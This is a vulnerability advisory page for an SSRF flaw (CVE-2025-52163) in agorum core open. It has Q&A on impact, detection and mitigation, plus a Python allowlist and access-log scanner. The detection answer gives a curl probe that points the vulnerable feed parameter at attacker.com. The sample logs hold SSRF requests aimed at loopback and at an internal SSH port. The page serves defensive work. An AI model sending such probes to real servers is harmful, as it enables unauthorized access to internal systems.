CVE-2025-52163
BaseFortify
Publication date: 2025-07-18
Last updated on: 2025-07-22
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| agorum_software_gmbh | agorum_core_open | 11.9.2 |
| agorum_software_gmbh | agorum_core_open | 11.9.1.3-1857 |
| agorum_software_gmbh | agorum_core_open | 11.10.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-52163 is a Server-Side Request Forgery (SSRF) vulnerability in the TunnelServlet component of agorum Software GmbH's agorum core open version 11.9.1.3-1857. It allows attackers to craft requests that force the server to initiate connections to arbitrary internal or external resources. This means an attacker can make the server fetch data from locations it normally would not reach, potentially exposing sensitive information or enabling further attacks. [1]
How can this vulnerability impact me?
This vulnerability can impact you by allowing attackers to make the vulnerable server connect to arbitrary internal or external systems. This can lead to exposure of sensitive data, unauthorized access to internal resources, or facilitate additional attacks by leveraging the server's network privileges. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can be performed by monitoring for crafted requests targeting vulnerable endpoints such as `/roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp` with manipulated `feed` parameters or `/roiwebui/TunnelServlet` with parameters like `tunnelAddress` and `tunnelPort`. For example, using curl to test SSRF behavior: `curl -v 'http://<target>/roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?feed=http://attacker.com'` to see if the server fetches external content. Network monitoring tools can also be used to detect unusual outbound connections initiated by the server to internal or external resources. Additionally, testing with Burp Suite Collaborator or similar tools can confirm if the server makes outbound requests upon crafted inputs. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include evaluating whether server-side requests are necessary. If they are, implement an allowlist restricting requests to only specific trusted systems. If arbitrary external requests are required, implement a denylist to block disallowed requests based on expected legitimate request formats. Additionally, upgrade the affected Agorum core open software to fixed versions 11.9.2 or 11.10.1 as released by the vendor to address the vulnerability. [1]
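The following is an added example, not code from BaseFortify or from agorum, that serves both the detection answer and the mitigation answer above. It implements the allowlist the mitigation answer recommends as a check on outbound targets (a listed host name only; IP literals, non-http(s) schemes, non-standard ports and URLs carrying user info are rejected), and then applies that same check as a detection rule over constructed web-server access-log lines for the two endpoints and the `feed`, `tunnelAddress` and `tunnelPort` parameters named in the detection answer. The allowlist contents, the client and target IP addresses and the log lines are constructed assumptions; only the endpoint paths and parameter names come from the page.

```python
"""Added example, not code from BaseFortify or agorum: an SSRF allowlist check for
server-side fetches and an access-log scan that applies the same check to the
`feed`, `tunnelAddress` and `tunnelPort` parameters of the two endpoints named
above. Allowlist contents, IPs and log lines are constructed."""

import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the only names and ports the application is expected to reach.
ALLOWED_HOSTS = {"feeds.example.com", "intranet-news.example.com"}
ALLOWED_PORTS = {80, 443}

# Endpoint paths as given in the detection answer on the page.
RSS_ENDPOINT = "/roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp"
TUNNEL_ENDPOINT = "/roiwebui/TunnelServlet"


def is_allowed_host(host: str) -> bool:
    """Name-based allowlist. IP literals are rejected outright: they bypass any
    name list and are how loopback, RFC1918 and link-local addresses get reached."""
    host = (host or "").strip().lower().rstrip(".")
    if not host:
        return False
    try:
        ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return host in ALLOWED_HOSTS  # not an IP literal: must be a listed name
    return False


def is_allowed_url(url: str) -> bool:
    """Mitigation check for a URL the server is asked to fetch (e.g. the `feed` value)."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False  # no file:, gopher:, etc.
    if parts.username or parts.password:
        return False  # "https://trusted@other-host" style confusion
    if port is not None and port not in ALLOWED_PORTS:
        return False
    return is_allowed_host(parts.hostname)


def is_allowed_tunnel(address: str, port: str) -> bool:
    """Mitigation check for a host/port pair such as tunnelAddress/tunnelPort."""
    try:
        return is_allowed_host(address) and int(port) in ALLOWED_PORTS
    except ValueError:
        return False


# Combined log format: client, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Detection: return (client, path, parameter, value) for every request to the
    two endpoints whose requested target fails the allowlist."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        qs = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
        if parts.path == RSS_ENDPOINT:
            for feed in qs.get("feed", []):
                if not is_allowed_url(feed):
                    findings.append((m.group("src"), parts.path, "feed", feed))
        elif parts.path == TUNNEL_ENDPOINT:
            addr = qs.get("tunnelAddress", [""])[0]
            port = qs.get("tunnelPort", [""])[0]
            if not is_allowed_tunnel(addr, port):
                findings.append((m.group("src"), parts.path, "tunnelAddress", f"{addr}:{port}"))
    return findings


# Constructed access-log lines (query strings percent-encoded as a web server records them).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2025:10:00:01 +0000] "GET /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?feed=https%3A%2F%2Ffeeds.example.com%2Fnews.xml HTTP/1.1" 200 5123',
    '10.0.0.9 - - [18/Jul/2025:10:00:07 +0000] "GET /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?feed=http%3A%2F%2F127.0.0.1%3A8080%2Fstatus HTTP/1.1" 200 812',
    '10.0.0.9 - - [18/Jul/2025:10:00:08 +0000] "GET /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?feed=http%3A%2F%2Fexample.net%2Ffeed.xml HTTP/1.1" 200 640',
    '10.0.0.9 - - [18/Jul/2025:10:00:09 +0000] "GET /roiwebui/TunnelServlet?tunnelAddress=10.0.0.1&tunnelPort=22 HTTP/1.1" 200 231',
    '10.0.0.5 - - [18/Jul/2025:10:00:12 +0000] "GET /roiwebui/TunnelServlet?tunnelAddress=intranet-news.example.com&tunnelPort=443 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [18/Jul/2025:10:00:15 +0000] "GET /roiwebui/index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, path, param, value in scan_access_log(SAMPLE_LOG):
        print(f"SSRF-suspect request from {src} to {path}: {param}={value}")
```

Run stand-alone, the scan reports three of the six constructed lines: the feed pointing at loopback, the feed pointing at an unlisted public host, and the tunnel request to a private address on port 22; the two requests to listed names on listed ports and the unrelated page request pass. The check is deliberately an allowlist of names rather than a denylist of addresses, which is why the unlisted public host is flagged too: the mitigation answer's denylist fallback would let that one through.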